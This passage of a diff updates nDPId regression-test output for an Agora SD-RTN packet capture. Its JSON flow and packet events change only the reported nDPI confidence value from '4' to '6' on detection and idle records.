00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1649093575788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093575788,"pkt":"eJS0JASgYDjgxTWgCABFoAEGb9FAAD8R\/a\/AqAJkaKahE6xjH8IA8jq3ADeIqAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTE5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg4GW0AOb4miWYrD79V3dp03Avt7TH5wg+CXWI7wUFFQUQEAEFFU0dQVUJTQQAEjCK+WoT2o97rehkI3TG55IXFgAabPHd4hAmu5nn67YI3raymU5Wjq30alJlITK96tt+JtMNgvpxcYqAphTU6mUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1649093575788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093575788,"pkt":"eJS0JASgYDjgxTWgCABFoAEGb9JAAD8R\/a7AqAJkaKahE6xjH8IA8jq3ADeIqAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTE5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg4GW0AOb4miWYrD79V3dp03Avt7TH5wg+CXWI7wUFFQUQEAEFFU0dQVUJTQQAEjCK+WoT2o97rehkI3TG55IXFgAabPHd4hAmu5nn67YI3raymU5Wjq30alJlITK96tt+JtMNgvpxcYqAphTU6mUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093580792,"flow_last_seen":1649093580792,"flow_idle_time":200000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":0,"thread_ts_msec":1649093580792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1649093580792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1649093580792,"pkt":"eJS0JASgYDjgxTWgCABFoAEDlPVAAD8RFQXAqAJkgAFNQqxjH8IA73jXAJl4HQAAIQAAAAAABFNOSQAZADEyOC0xLTc3LTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg90n6PIHuGl\/eNNcAGtWbljeiinpOBz\/8f6Thq1EFFQUQEAEFFU0dQVUJTQQAE4fteiUHAa3vScKrQ7k6uVwHTk73GWGrTdxZ5NRX5jjFw27S+1Fe\/4HWIj\/MeCLdpKQNrrdCTyFKV0x0L6QsHDEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093580792,"flow_last_seen":1649093580792,"flow_idle_time":200000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":0,"thread_ts_msec":1649093580792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093580792,"flow_last_seen":1649093580792,"flow_idle_time":200000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":0,"thread_ts_msec":1649093580792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1649093580793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1649093580793,"pkt":"eJS0JASgYDjgxTWgCABFoAEDlPZAAD8RFQTAqAJkgAFNQqxjH8IA73jXAJl4HQAAIQAAAAAABFNOSQAZADEyOC0xLTc3LTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg90n6PIHuGl\/eNNcAGtWbljeiinpOBz\/8f6Thq1EFFQUQEAEFFU0dQVUJTQQAE4fteiUHAa3vScKrQ7k6uVwHTk73GWGrTdxZ5NRX5jjFw27S+1Fe\/4HWIj\/MeCLdpKQNrrdCTyFKV0x0L6QsHDEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1649093580793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1649093580793,"pkt":"eJS0JASgYDjgxTWgCABFoAEDlPdAAD8RFQPAqAJkgAFNQqxjH8IA73jXAJl4HQAAIQAAAAAABFNOSQAZADEyOC0xLTc3LTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg90n6PIHuGl\/eNNcAGtWbljeiinpOBz\/8f6Thq1EFFQUQEAEFFU0dQVUJTQQAE4fteiUHAa3vScKrQ7k6uVwHTk73GWGrTdxZ5NRX5jjFw27S+1Fe\/4HWIj\/MeCLdpKQNrrdCTyFKV0x0L6QsHDEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640794,"flow_last_seen":1649093640794,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093640794,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1649093640794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093640794,"pkt":"eJS0JASgYDjgxTWgCABFoAEG+itAAD8RqmPAqAJkF\/i6s6xjH8IA8v\/kAJCYkAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJh5RjvoT8nXWQoTczbqfuCTWtSWIxMM71dLXfMImkFFQUQEAEFFU0dQVUJTQQAEo1EDK0BV7P7bdQLDfP5fh7OnOsU36QmWzSAbWPLojMYYoxcRozYKWIUqAOqOVU9JKdnROu06m38bLWdrLI75sktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640794,"flow_last_seen":1649093640794,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093640794,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640794,"flow_last_seen":1649093640794,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093640794,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1649093640794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093640794,"pkt":"eJS0JASgYDjgxTWgCABFoAEG+ixAAD8RqmLAqAJkF\/i6s6xjH8IA8v\/kAJCYkAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJh5RjvoT8nXWQoTczbqfuCTWtSWIxMM71dLXfMImkFFQUQEAEFFU0dQVUJTQQAEo1EDK0BV7P7bdQLDfP5fh7OnOsU36QmWzSAbWPLojMYYoxcRozYKWIUqAOqOVU9JKdnROu06m38bLWdrLI75sktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1649093640794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093640794,"pkt":"eJS0JASgYDjgxTWgCABFoAEG+i1AAD8RqmHAqAJkF\/i6s6xjH8IA8v\/kAJCYkAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJh5RjvoT8nXWQoTczbqfuCTWtSWIxMM71dLXfMImkFFQUQEAEFFU0dQVUJTQQAEo1EDK0BV7P7bdQLDfP5fh7OnOsU36QmWzSAbWPLojMYYoxcRozYKWIUqAOqOVU9JKdnROu06m38bLWdrLI75sktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":0,"thread_ts_msec":1649093640842,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1649093640842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1649093640842,"pkt":"eJS0JASgYDjgxTWgCABFoAD+96lAAD8RrO3AqAJkF\/i6s7bOH8IA6rDHAE8OHQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnlO0oTMjFpPQok0BeNgyMsfWK6tyRBP6qOIuGb0FFQUQEAEFFU0dQVUJTQQAEAmWTpv00Mu9s9eHO9YKHmJzM0p0SEfRhaw\/S2nD2he9vNE4MilAXm44Pd9F9VdBkmWwGneaYgayG992+Tfg\/xEtFWFMEAFAyNTZDQ1JUIAD\/l8GP5RGYHxKUln7foXlIqEex7RofPmJwbQTGCLgnmQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":0,"thread_ts_msec":1649093640842,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":0,"thread_ts_msec":1649093640842,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1649093640842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1649093640842,"pkt":"eJS0JASgYDjgxTWgCABFoAD+96pAAD8RrOzAqAJkF\/i6s7bOH8IA6rDHAE8OHQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnlO0oTMjFpPQok0BeNgyMsfWK6tyRBP6qOIuGb0FFQUQEAEFFU0dQVUJTQQAEAmWTpv00Mu9s9eHO9YKHmJzM0p0SEfRhaw\/S2nD2he9vNE4MilAXm44Pd9F9VdBkmWwGneaYgayG992+Tfg\/xEtFWFMEAFAyNTZDQ1JUIAD\/l8GP5RGYHxKUln7foXlIqEex7RofPmJwbQTGCLgnmQ=="} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1649093640842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1649093640842,"pkt":"eJS0JASgYDjgxTWgCABFoAD+96tAAD8RrOvAqAJkF\/i6s7bOH8IA6rDHAE8OHQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnlO0oTMjFpPQok0BeNgyMsfWK6tyRBP6qOIuGb0FFQUQEAEFFU0dQVUJTQQAEAmWTpv00Mu9s9eHO9YKHmJzM0p0SEfRhaw\/S2nD2he9vNE4MilAXm44Pd9F9VdBkmWwGneaYgayG992+Tfg\/xEtFWFMEAFAyNTZDQ1JUIAD\/l8GP5RGYHxKUln7foXlIqEex7RofPmJwbQTGCLgnmQ=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093710805,"flow_last_seen":1649093710805,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093710805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1649093710805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093710805,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsJpAAD8R8\/PAqAJkF\/i6tKxjH8IA8uctAM5VpAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJi\/yhYl+4tFxfRy\/hjYWvCs3sWcLaw7yUyJriC7EkFFQUQEAEFFU0dQVUJTQQAEvd1t+W9UAMlutRwaUc3brStpNzMotBC8tKv3ozdxhPxlu+KeK3Ixnyt4Iph078ycHtNzhwl8N0HwbJs1Xqgd6EtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093710805,"flow_last_seen":1649093710805,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093710805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093710805,"flow_last_seen":1649093710805,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093710805,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1649093710806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093710806,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsJtAAD8R8\/LAqAJkF\/i6tKxjH8IA8uctAM5VpAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJi\/yhYl+4tFxfRy\/hjYWvCs3sWcLaw7yUyJriC7EkFFQUQEAEFFU0dQVUJTQQAEvd1t+W9UAMlutRwaUc3brStpNzMotBC8tKv3ozdxhPxlu+KeK3Ixnyt4Iph078ycHtNzhwl8N0HwbJs1Xqgd6EtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1649093710806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093710806,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsJxAAD8R8\/HAqAJkF\/i6tKxjH8IA8uctAM5VpAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJi\/yhYl+4tFxfRy\/hjYWvCs3sWcLaw7yUyJriC7EkFFQUQEAEFFU0dQVUJTQQAEvd1t+W9UAMlutRwaUc3brStpNzMotBC8tKv3ozdxhPxlu+KeK3Ixnyt4Iph078ycHtNzhwl8N0HwbJs1Xqgd6EtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494644,"flow_last_seen":1649093494689,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494350,"flow_last_seen":1649093494400,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494644,"flow_last_seen":1649093494689,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093494350,"flow_last_seen":1649093494400,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3169,"flow_avg_l4_payload_len":211,"midstream":0,"thread_ts_msec":1649093710879,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-payload-len":29232,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":8,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1649098069656} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069656,"flow_last_seen":1649098069656,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069656,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1649098069656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069656,"pkt":"eJS0JASgYDjgxTWgCABFoAEGneRAAD8RBqvAqAJkF\/i6s53JH8IA8s3FANAqagAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXiddqZ56BOXneEQ4mP388RlUbMx7s0KlWJgk5kvEFFQUQEAEFFU0dQVUJTQQAE2i0ZP5UqhloJODTaOh+IlYI+UqEvQtfYePDLs+DPY\/wb\/ex7kxsKDZa0UBpqtKFPW3cONzQvrgAKQsaxWmXF50tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 